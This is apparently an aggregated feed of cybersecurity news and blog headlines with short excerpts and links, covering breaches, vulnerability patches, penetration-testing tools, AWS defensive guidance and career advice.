Initial Publication Date: 04/25/2023 10:00AM EST
A security researcher recently reported an issue with AWS's recently-released (November 16th, 2022) support for multiple multi-factor authentication (MFA) devices for IAM user principals. The reported issue could have potentially arisen only when the following three conditions were met: (1) An IAM user had possession of long-term access key (AK)/secret key (SK) credentials, (2) that IAM user had the privilege to add an MFA to their own identity without using an MFA, and (3) that IAM user's overall access privileges beyond console sign-in had been configured by an administrator to be greater after adding the MFA. Under those narrow conditions, possession of AK/SK alone was equivalent to possession of AK/SK and a previously configured MFA....
https://aws.amazon.com/security/security-bulletins/AWS-2023-001/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Privacy Implications of Web 3.0 and Darknets
The evolution of the internet has been rapid over the years and has impacted the privacy implications of Web 3.0 and Darknets
https://www.darknet.org.uk/2023/03/privacy-implications-of-web-3-0-and-darknets/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
DataSurgeon – Extract Sensitive Information (PII) From Logs
DataSurgeon (ds) is a versatile tool designed to Extract Sensitive Information (PII) From Logs, it's intended to be used for incident response, penetration testing, and CTF challenges.
https://www.darknet.org.uk/2023/03/datasurgeon-extract-sensitive-information-pii-from-logs/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
We're going teetotal: It's goodbye to The Daily Swig
PortSwigger today announces that The Daily Swig is closing down
https://portswigger.net/daily-swig/were-going-teetotal-its-goodbye-to-the-daily-swig
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Bug Bounty Radar // The latest bug bounty programs for March 2023
New web targets for the discerning hacker
https://portswigger.net/daily-swig/bug-bounty-radar-the-latest-bug-bounty-programs-for-march-2023
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Indian transport ministry flaws potentially allowed creation of counterfeit driving licenses
Armed with personal data fragments, a researcher could also access 185 million citizens' PII
https://portswigger.net/daily-swig/indian-transport-ministry-flaws-potentially-allowed-creation-of-counterfeit-driving-licenses
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Password managers: A rough guide to enterprise secret platforms
The second part of our password manager series looks at business-grade tech to handle API tokens, login credentials, and more
https://portswigger.net/daily-swig/password-managers-a-rough-guide-to-enterprise-secret-platforms
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Chromium bug allowed SameSite cookie bypass on Android devices
Protections against cross-site request forgery could be bypassed
https://portswigger.net/daily-swig/chromium-bug-allowed-samesite-cookie-bypass-on-android-devices
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Deserialized web security roundup: Twitter 2FA backlash, GoDaddy suffers years-long attack campaign, and XSS Hunter adds e2e encryption
Your fortnightly rundown of AppSec vulnerabilities, new hacking techniques, and other cybersecurity news
https://portswigger.net/daily-swig/deserialized-web-security-roundup-twitter-2fa-backlash-godaddy-suffers-years-long-attack-campaign-and-xss-hunter-adds-e2e-encryption
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
NIST plots biggest ever reform of Cybersecurity Framework
CSF 2.0 blueprint offered up for public review
https://portswigger.net/daily-swig/nist-plots-biggest-ever-reform-of-cybersecurity-framework
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cisco ClamAV anti-malware scanner vulnerable to serious security flaw
Patch released for bug that poses a critical risk to vulnerable technologies
https://portswigger.net/daily-swig/cisco-clamav-anti-malware-scanner-vulnerable-to-serious-security-flaw
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CVSS system criticized for failure to address real-world impact
JFrog argues vulnerability risk metrics need complete revamp
https://portswigger.net/daily-swig/cvss-system-criticized-for-failure-to-address-real-world-impact
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
A Realistic Look at Implications of ChatGPT for Cybercrime
Analyzing ChatGPT's capabilities and various claims about how it will revolutionize cybercrime.
https://malwaretech.com/2023/02/a-realistic-look-at-chatgpt-cybercrime.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
‘Most web API flaws are missed by standard security tests' – Corey J Ball on securing a neglected attack vector
API security is a ‘great gateway' into a pen testing career, advises specialist in the field
https://portswigger.net/daily-swig/most-web-api-flaws-are-missed-by-standard-security-tests-corey-j-ball-on-securing-a-neglected-attack-vector
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
HTTP request smuggling bug patched in HAProxy
Exploitation could enable attackers to access backend servers
https://portswigger.net/daily-swig/http-request-smuggling-bug-patched-in-haproxy
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Belgium launches nationwide safe harbor for ethical hackers
New legal protections for security researchers could be the strongest of any EU country
https://portswigger.net/daily-swig/belgium-launches-nationwide-safe-harbor-for-ethical-hackers
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Pwnagotchi – Maximize Crackable WPA Key Material For Bettercap
Pwnagotchi is an A2C-based "AI" leveraging bettercap that learns from its surrounding WiFi environment to maximize crackable WPA key material it captures
https://www.darknet.org.uk/2023/02/pwnagotchi-maximize-crackable-wpa-key-material-for-bettercap/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Lessons Learned from Cybersecurity Mentoring
I suppose one could say that I’ve been doing this far too long, and I’ve gained some knowledge about how the cybersecurity industry works, and how people succeed or fail at the field. To give back to newcomers, I recently opened up a Calendly to do ad hoc career mentoring, in addition to the career… Read More Lessons Learned from Cybersecurity Mentoring
https://tisiphone.net/2023/01/03/lessons-learned-from-cybersecurity-mentoring/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
HardCIDR – Network CIDR and Range Discovery Tool
HardCIDR is a Linux Bash script to discover the netblocks, or ranges, (in CIDR notation) owned by the target organization during the intelligence gathering phase of a penetration test.
https://www.darknet.org.uk/2022/12/hardcidr-network-cidr-and-range-discovery-tool/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
TikTok is a National Security Risk, Not A Privacy One
An analysis of the threat posed by TikTok and why we need to weigh our options carefully.
https://malwaretech.com/2022/12/tiktok-is-a-national-security-risk.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Career Counseling Office Hours!
I now have some limited appointments for career counseling and resume discussion open for sign-ups. These sessions are free for college students and current enlisted military, and tip-what-you can for everyone else, if you feel my help was meaningful. You can sign up here: https://calendly.com/lesleycarhart Keep in mind that I can only review North American… Read More Career Counseling Office Hours!
https://tisiphone.net/2022/12/05/career-counseling-office-hours/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
I've Moved to Mastodon!
Hi friends! I hope you’re having a wonderful Thanksgiving weekend (for the US folks), or a nice weekend regardless of location. I just wanted to drop a quick note to let you all know that from now on the best way to follow my daily social media posts, which include Q&As, cybersecurity news, and news… Read More I’ve Moved to Mastodon!
https://tisiphone.net/2022/11/26/ive-moved-to-mastodon/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Podcast: Securing Bridges | A Live Stream Podcast With Alyssa Miller | Guest: Lesley Carhart | Episode 28
Via: https://www.itspmagazine.com/securing-bridges-podcast
https://tisiphone.net/2022/11/13/podcast-securing-bridges-a-live-stream-podcast-with-alyssa-miller-guest-lesley-carhart-episode-28/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Infosec Mastodon Lists!
Hi pals! I hear you like lists as folks migrate over to Mastodon. Here are some I will keep relatively updated you may find useful, just to track people down! If you want me to remove you for some reason, contact me by DM or email. You can import these lists in your Mastodon preferences… Read More Infosec Mastodon Lists!
https://tisiphone.net/2022/11/10/infosec-mastodon-lists/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Everything you need to know about the OpenSSL 3.0.7 Patch (CVE-2022-3602 & CVE-2022-3786)
https://malwaretech.com/2022/11/everything-you-need-to-know-about-the-openssl-3-0-7-patch.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability
On Tuesday, November 1 2022 between 1300-1700 UTC, the OpenSSL project announced the release of a new version of OpenSSL (version 3.0.7) that will patch a critical vulnerability in OpenSSL version 3.0 and above. Only OpenSSL versions between 3.0 and 3.0.6 are affected at the time of writing. At this moment the details of this [...]
The post CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/general-tutorials/openssl-3-0-7-patches-critical-vulnerability/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
(Podcast) ITSP – Martial Arts, Marksmanship, And ICS Cyber Incident Response | A Conversation With Lesley Carhart
https://itspmagazinepodcast.com/episodes/martial-arts-marksmanship-and-ics-cyber-incident-response-a-conversation-with-lesley-carhart-cy-beat-podcast-with-deb-radcliff-2dWkd8yh
https://tisiphone.net/2022/10/10/podcast-itsp-martial-arts-marksmanship-and-ics-cyber-incident-response-a-conversation-with-lesley-carhart/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ASIS Article – Preparing for OT Incident Response
https://www.asisonline.org/security-management-magazine/monthly-issues/security-technology/archive/2022/october/Your-Cyber-Response-Plan-Needs-These-6-Components/ Cybersecurity incidents are no longer a matter of if, but when. Building a good strategy and architecture to deter intrusions is incredibly important in reducing the frequency and severity of incidents, but there is no scenario where any organization is totally immune. That means that every organization must have a plan for what they… Read More ASIS Article – Preparing for OT Incident Response
https://tisiphone.net/2022/10/10/asis-article-preparing-for-ot-incident-response/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Student Loan Breach Exposes 2.5M Records
2.5 million people were affected, in a breach that could spell more trouble down the line.
https://threatpost.com/student-loan-breach-exposes-2-5m-records/180492/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Watering Hole Attacks Push ScanBox Keylogger
Researchers uncover a watering hole attack likely carried out by APT TA423, which attempts to plant the ScanBox JavaScript-based reconnaissance tool.
https://threatpost.com/watering-hole-attacks-push-scanbox-keylogger/180490/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Tentacles of ‘0ktapus' Threat Group Victimize 130 Firms
Over 130 companies tangled in sprawling phishing campaign that spoofed a multi-factor authentication system.
https://threatpost.com/0ktapus-victimize-130-firms/180487/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Ransomware Attacks are on the Rise
Lockbit is by far this summer's most prolific ransomware group, trailed by two offshoots of the Conti group.
https://threatpost.com/ransomware-attacks-are-on-the-rise/180481/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cybercriminals Are Selling Access to Chinese Surveillance Cameras
Tens of thousands of cameras have failed to patch a critical, 11-month-old CVE, leaving thousands of organizations exposed.
https://threatpost.com/cybercriminals-are-selling-access-to-chinese-surveillance-cameras/180478/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Twitter Whistleblower Complaint: The TL;DR Version
Twitter is blasted for security and privacy lapses by the company's former head of security who alleges the social media giant's actions amount to a national security risk.
https://threatpost.com/twitter-whistleblower-tldr-version/180472/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Firewall Bug Under Active Attack Triggers CISA Warning
CISA is warning that Palo Alto Networks' PAN-OS is under active attack and needs to be patched ASAP.
https://threatpost.com/firewall-bug-under-active-attack-cisa-warning/180467/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Fake Reservation Links Prey on Weary Travelers
Fake travel reservations are exacting more pain from the travel weary, already dealing with the misery of canceled flights and overbooked hotels.
https://threatpost.com/reservation-links-prey-on-travelers/180462/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
iPhone Users Urged to Update to Patch 2 Zero-Days
Separate fixes to macOS and iOS patch respective flaws in the kernel and WebKit that can allow threat actors to take over devices and are under attack.
https://threatpost.com/iphone-users-urged-to-update-to-patch-2-zero-days-under-attack/180448/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Google Patches Chrome's Fifth Zero-Day of the Year
An insufficient validation input flaw, one of 11 patched in an update this week, could allow for arbitrary code execution and is under active attack.
https://threatpost.com/google-patches-chromes-fifth-zero-day-of-the-year/180432/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
[Video] Introduction to Use-After-Free Vulnerabilities | UserAfterFree Challenge Walkthrough (Part: 1)
https://malwaretech.com/2022/05/video-introduction-to-use-after-free-vulnerabilities-userafterfree-challenge-walkthrough-part-1.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Socialscan – Command-Line Tool To Check For Email And Social Media Username Usage
socialscan is an accurate command-line tool to check For email and social media username usage on online platforms, given an email address or username, socialscan returns whether it is available, taken or invalid on online platforms. Other similar tools check username availability by requesting the profile page of the username in question and based on […]
https://www.darknet.org.uk/2022/04/socialscan-command-line-tool-to-check-for-email-and-social-media-username-usage/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
[Video] Exploiting Windows RPC – CVE-2022-26809 Explained | Patch Analysis
https://malwaretech.com/2022/04/video-exploiting-windows-rpc-cve-2022-26809-explained-patch-analysis.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CFRipper – CloudFormation Security Scanning & Audit Tool
CFRipper is a Python-based Library and CLI security analyzer that functions as an AWS CloudFormation security scanning and audit tool, it aims to prevent vulnerabilities from getting to production infrastructure through vulnerable CloudFormation scripts. You can use CFRipper to prevent deploying insecure AWS resources into your Cloud environment. You can write your own compliance checks […]
https://www.darknet.org.uk/2022/01/cfripper-cloudformation-security-scanning-audit-tool/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Installing Rogue-jndi on Kali Linux
Following the previous tutorial in which we looked at the log4j vulnerability in VMWare vSphere server, I got some questions about how to set up a malicious LDAP server on Linux. The attacker controlled LDAP server is required to provide the malicious java class (with a reverse shell for example) in response to the forged [...]
The post Installing Rogue-jndi on Kali Linux appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/general-tutorials/installing-rogue-jndi-on-kali-linux/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CredNinja – Test Credential Validity of Dumped Credentials or Hashes
CredNinja is a tool to quickly test credential validity of dumped credentials (or hashes) across an entire network or domain very efficiently. At the core of it, you provide it with a list of credentials you have dumped (or hashes, it can pass-the-hash) and a list of systems on the domain (the author suggests scanning […]
https://www.darknet.org.uk/2022/01/credninja-test-credential-validity-of-dumped-credentials-or-hashes/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Log4Shell VMware vCenter Server (CVE-2021-44228)
Log4Shell is a critical vulnerability with the highest possible CVSSv3 score of 10.0 that affects thousands of products running Apache Log4j and leaves millions of targets potentially vulnerable. CVE-2021-44228 affects log4j versions 2.0-beta9 to 2.14.1. Log4j is an incredibly popular logging library used in many different products and various Apache frameworks like Struts2, Kafka, and [...]
The post Log4Shell VMware vCenter Server (CVE-2021-44228) appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/exploit-tutorials/log4shell-vmware-vcenter-server-cve-2021-44228/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How to customize behavior of AWS Managed Rules for AWS WAF
AWS Managed Rules for AWS WAF provides a group of rules created by AWS that can be used help protect you against common application vulnerabilities and other unwanted access to your systems without having to write your own rules. AWS Threat Research Team updates AWS Managed Rules to respond to an ever-changing threat landscape in order […]
https://aws.amazon.com/blogs/security/how-to-customize-behavior-of-aws-managed-rules-for-aws-waf/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
An in-depth look at hacking back, active defense, and cyber letters of marque
https://malwaretech.com/2021/11/an-in-depth-look-at-hacking-back-active-defense-and-cyber-letters-of-marque.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The Great Leak: Microsoft Exchange AutoDiscover Design Flaw
Recently a “design flaw” in the Microsoft Exchange’s Autodiscover protocol was discovered by researchers that allowed access to 372,072 Windows domain credentials and 96,671 unique sets of credentials from applications such as Microsoft Outlook and third-party email clients. According to Amit Serper , the person who discovered the flaw, the source of the leak is [...]
The post The Great Leak: Microsoft Exchange AutoDiscover Design Flaw appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/pentesting-exchange/the-great-leak-microsoft-exchange-autodiscover-design-flaw/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Ask Lesley: How Much Should SOC Work Suck?
“Dear Lesley, I’ve been in a MSSP Security Operations Center (SOC) for a few months as my first cybersecurity job. The work is monotonous, I have access to only a few SIEM tools, and most of what I do is handle repetitive tickets for a ton of customers all by myself on awkward shifts. I… Read More Ask Lesley: How Much Should SOC Work Suck?
https://tisiphone.net/2021/09/22/ask-lesley-how-much-should-soc-work-suck/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The three most important AWS WAF rate-based rules
In this post, we explain what the three most important AWS WAF rate-based rules are for proactively protecting your web applications against common HTTP flood events, and how to implement these rules. We share what the Shield Response Team (SRT) has learned from helping customers respond to HTTP floods and show how all AWS WAF […]
https://aws.amazon.com/blogs/security/three-most-important-aws-waf-rate-based-rules/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Automatically update AWS WAF IP sets with AWS IP ranges
Note: This blog post describes how to automatically update AWS WAF IP sets with the most recent AWS IP ranges for AWS services. This related blog post describes how to perform a similar update for Amazon CloudFront IP ranges that are used in VPC Security Groups. You can use AWS Managed Rules for AWS WAF […]
https://aws.amazon.com/blogs/security/automatically-update-aws-waf-ip-sets-with-aws-ip-ranges/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
AWS Shield threat landscape review: 2020 year-in-review
AWS Shield is a managed service that protects applications that are running on Amazon Web Services (AWS) against external threats, such as bots and distributed denial of service (DDoS) attacks. Shield detects network and web application-layer volumetric events that may indicate a DDoS attack, web content scraping, or other unauthorized non-human traffic that is interacting […]
https://aws.amazon.com/blogs/security/aws-shield-threat-landscape-review-2020-year-in-review/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Reasonable IR Team Expectations
With the surplus of ransomware attacks consistently increasing, I have unfortunately witnessed another increase – in shoddy and predatory cybersecurity incident response firms with good SEO taking advantage of victims. In some cases this may be opportunistic, and in others simply a side effect of the shortage of senior and principal level incident responders in… Read More Reasonable IR Team Expectations
https://tisiphone.net/2021/05/11/reasonable-ir-team-expectations/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Ask Lesley: From Ops to DFIR, a Tough Transition
Lesley, I am having the hardest time getting my foot in the door in an investigative role. I have spent almost 4 years at the same job, in the same role, and cannot find a way to transition out of the operations side of the house. I went into operations with the intent of doing… Read More Ask Lesley: From Ops to DFIR, a Tough Transition
https://tisiphone.net/2021/03/19/ask-lesley-from-ops-to-dfir-a-tough-transition/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How to protect a self-managed DNS service against DDoS attacks using AWS Global Accelerator and AWS Shield Advanced
In this blog post, I show you how to improve the distributed denial of service (DDoS) resilience of your self-managed Domain Name System (DNS) service by using AWS Global Accelerator and AWS Shield Advanced. You can use those services to incorporate some of the techniques used by Amazon Route 53 to protect against DDoS attacks. […]
https://aws.amazon.com/blogs/security/how-to-protect-a-self-managed-dns-service-against-ddos-attacks-using-aws-global-accelerator-and-aws-shield-advanced/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Set up centralized monitoring for DDoS events and auto-remediate noncompliant resources
When you build applications on Amazon Web Services (AWS), it's a common security practice to isolate production resources from non-production resources by logically grouping them into functional units or organizational units. There are many benefits to this approach, such as making it easier to implement the principal of least privilege, or reducing the scope of […]
https://aws.amazon.com/blogs/security/set-up-centralized-monitoring-for-ddos-events-and-auto-remediate-noncompliant-resources/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Deploying defense in depth using AWS Managed Rules for AWS WAF (part 2)
In this post, I show you how to use recent enhancements in AWS WAF to manage a multi-layer web application security enforcement policy. These enhancements will help you to maintain and deploy web application firewall configurations across deployment stages and across different types of applications. In part 1 of this post I describe the technologies […]
https://aws.amazon.com/blogs/security/deploying-defense-in-depth-using-aws-managed-rules-for-aws-waf-part-2/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Defense in depth using AWS Managed Rules for AWS WAF (part 1)
In this post, I discuss how you can use recent enhancements in AWS WAF to manage a multi-layer web application security enforcement policy. These enhancements will help you to maintain and deploy web application firewall configurations across deployment stages and across different types of applications. The post is in two parts. This first part describes […]
https://aws.amazon.com/blogs/security/defense-in-depth-using-aws-managed-rules-for-aws-waf-part-1/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Houston consulate one of worst offenders in Chinese espionage, say U.S. officials
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: Reuters The United States ordered the consulate closed this week, leading China to retaliate on Friday by telling the United States to shut its consulate in the city of Chengdu, as relations between the world's two largest economies […]
The post Houston consulate one of worst offenders in Chinese espionage, say U.S. officials appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/07/24/houston-consulate-one-of-worst-offenders-in-chinese-espionage-say-u-s-officials/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Shocked I am. Shocked to find that underground bank-card-trading forums are full of liars, cheats, small-time grifters
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: The Register The denizens of online forums dedicated to trading in stolen credit cards have been shown to be wretched hives of scum and villainy. This not-so-surprising news comes this week via academics at Washington State University (WSU) in the US, […]
The post Shocked I am. Shocked to find that underground bank-card-trading forums are full of liars, cheats, small-time grifters appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/07/24/shocked-i-am-shocked-to-find-that-underground-bank-card-trading-forums-are-full-of-liars-cheats-small-time-grifters/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
AWS Shield Threat Landscape report is now available
AWS Shield is a managed threat protection service that safeguards applications running on AWS against exploitation of application vulnerabilities, bad bots, and Distributed Denial of Service (DDoS) attacks. The AWS Shield Threat Landscape Report (TLR) provides you with a summary of threats detected by AWS Shield. This report is curated by the AWS Threat Research […]
https://aws.amazon.com/blogs/security/aws-shield-threat-landscape-report-now-available/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Vint Cerf suggests GDPR could hurt coronavirus vaccine development
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: The Register TCP-IP-co-developer Vint Cerf, revered as a critical contributor to the foundations of the internet, has floated the notion that privacy legislation might hinder the development of a vaccination for the COVID-19 coronavirus. In an essay written for […]
The post Vint Cerf suggests GDPR could hurt coronavirus vaccine development appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/16/vint-cerf-suggests-gdpr-could-hurt-coronavirus-vaccine-development/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Brit defense contractor hacked, up to 100,000 past and present employees' details siphoned off – report
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: The Register Britain’s Ministry of Defence contractor Interserve has been hacked, reportedly leaking the details of up to 100,000 of past and current employees, including payment information and details of their next of kin. The Daily Telegraph reports that up to […]
The post Brit defense contractor hacked, up to 100,000 past and present employees’ details siphoned off – report appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/16/brit-defense-contractor-hacked-up-to-100000-past-and-present-employees-details-siphoned-off-report/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
US officially warns China is launching cyberattacks to steal coronavirus research
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: CNN The US Department of Homeland Security and the FBI issued a “public service announcement” Wednesday warning that China is likely launching cyberattacks to steal coronavirus data related to vaccines and treatments from US research institutions and pharmaceutical […]
The post US officially warns China is launching cyberattacks to steal coronavirus research appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/14/us-officially-warns-china-is-launching-cyberattacks-to-steal-coronavirus-research/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
There's Norway you're going to believe this: World's largest sovereign wealth fund conned out of m in cyber-attack
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: The Register The Norwegian Investment Fund has been swindled out of m (£8.2m) by fraudsters who pulled off what’s been described as “an advance data breach.” Norfund – the world’s largest sovereign wealth fund, created from saved North Sea […]
The post There’s Norway you’re going to believe this: World’s largest sovereign wealth fund conned out of m in cyber-attack appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/14/theres-norway-youre-going-to-believe-this-worlds-largest-sovereign-wealth-fund-conned-out-of-10m-in-cyber-attack/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Stop tracking me, Google: Austrian citizen files GDPR legal complaint over Android Advertising ID
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: The Register Privacy pressure group Noyb has filed a legal complaint against Google on behalf of an Austrian citizen, claiming the Android Advertising ID on every Android device is “personal data” as defined by the EU’s GDPR and that […]
The post Stop tracking me, Google: Austrian citizen files GDPR legal complaint over Android Advertising ID appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/14/stop-tracking-me-google-austrian-citizen-files-gdpr-legal-complaint-over-android-advertising-id/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cyber-attacks hit hospital construction companies
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: BBC Interserve, which helped build Birmingham’s NHS Nightingale hospital, and Bam Construct, which delivered the Yorkshire and the Humber’s, have reported the incidents to authorities. Earlier this month, the government warned healthcare groups involved in the response to […]
The post Cyber-attacks hit hospital construction companies appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/13/cyber-attacks-hit-hospital-construction-companies/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Researchers spot thousands of Android apps leaking user data through misconfigured Firebase databases
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: The Register Security researchers at Comparitech have reported that an estimated 24,000 Android apps are leaking user data because of misconfigured Firebase databases. Firebase is a popular backend service with SDKs for multiple platforms, including Android, iOS, web, C++ and Unity (for […]
The post Researchers spot thousands of Android apps leaking user data through misconfigured Firebase databases appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/13/researchers-spot-thousands-of-android-apps-leaking-user-data-through-misconfigured-firebase-databases/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Papa don't breach: Contracts, personal info on Madonna, Lady Gaga, Elton John, others swiped in celeb law firm ‘hack'
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: The Register Hackers are threatening to release 756GB of A-list celebs’ contracts, recording deals, and other personal info allegedly stolen from a New York law firm. The miscreants have seemingly got their hands on confidential agreements, private correspondence, contact […]
The post Papa don’t breach: Contracts, personal info on Madonna, Lady Gaga, Elton John, others swiped in celeb law firm ‘hack’ appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/13/papa-dont-breach-contracts-personal-info-on-madonna-lady-gaga-elton-john-others-swiped-in-celeb-law-firm-hack/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CVE-2019-19781: Citrix ADC RCE vulnerability
A week before the 2019 holidays Citrix announced that an authentication bypass vulnerability was discovered in multiple Citrix products. The affected products are the Citrix Application Delivery Controller (formerly known as NetScaler AD), Citrix Gateway NetScaler ADC (formerly known as NetScaler Gateway), and Citrix SD-WAN WANOP appliance. Exploiting the vulnerability could allow an unauthenticated attacker [...]
The post CVE-2019-19781: Citrix ADC RCE vulnerability appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/exploit-tutorials/cve-2019-19781-citrix-adc-rce-vulnerability/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations
For all scans so far, we've only used the default scan configurations such as host discovery, system discovery and Full & fast. But what if we don't want to run all NVTs on a given target (list) and only test for a few specific vulnerabilities? In this case we can create our own custom scan [...]
The post Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/scanning-tutorials/openvas-9-part-4-custom-scan-configurations/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Vulnerability Scanning with OpenVAS 9 part 3: Scanning the Network
In the previous parts of the Vulnerability Scanning with OpenVAS 9 tutorials we have covered the installation process and how to run vulnerability scans using OpenVAS and the Greenbone Security Assistant (GSA) web application. In part 3 of Vulnerability Scanning with OpenVAS 9 we will have a look at how to run scans using different [...]
The post Vulnerability Scanning with OpenVAS 9 part 3: Scanning the Network appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/scanning-tutorials/vulnerability-scanning-with-openvas-9-scanning-the-network/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Vulnerability Scanning with OpenVAS 9 part 2: Vulnerability Scanning
Is the previous tutorial Vulnerability Scanning with OpenVAS 9.0 part 1 we've gone through the installation process of OpenVAS on Kali Linux and the installation of the virtual appliance. In this tutorial we will learn how to configure and run a vulnerability scan. For demonstration purposes we've also installed a virtual machine with Metasploitable 2 [...]
